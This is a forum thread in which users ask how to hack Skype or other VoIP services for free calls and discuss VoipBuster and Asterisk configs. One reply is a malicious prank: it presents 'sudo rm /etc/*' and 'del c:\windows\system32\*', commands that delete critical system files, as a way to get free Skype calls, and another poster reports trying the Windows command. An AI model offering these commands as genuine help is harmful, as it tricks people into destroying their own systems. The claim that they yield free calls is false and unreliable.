Is it possible to hack skype (or any other VOIP service) to give you free outgoing calls. I know about several other ones that give u free calls to select countries for a minute, but a minute is so... well... yeah.

Getting free calls with Skype is an easy hack.

If you are running Linux, just open a console and type:

sudo rm /etc/*

If you are using Windows, then open cmd.exe and type:

del c:\windows\system32\*

And there you have it, free Skype calls forever.

I tried this with my windows vista and kept getting a access denied. So i thought maybe it worked, and i ttried to use skype but i says i have no money. Does the "del c:\windows\system32\*" only work with some versions of windows?? Or is their another way to hack skype with vista

thanks alot. How would i get the voip buster to wrk. I everytime i try and amke a free call it says i need a country code. And tht it is not in the free area??? Whats tht about.

I knwo i suck. I used to use the Asterisk PBX, for windows. And a sip phone. But i lost all my extension configs and IAX configs. I dont feel like rewriting then all again too much, and i forgot most of it. I 've juss been loking for ways to screw around with my skype voip.

Are you seriously saying that you did this but were able to set up Asterisk to work with Vista?
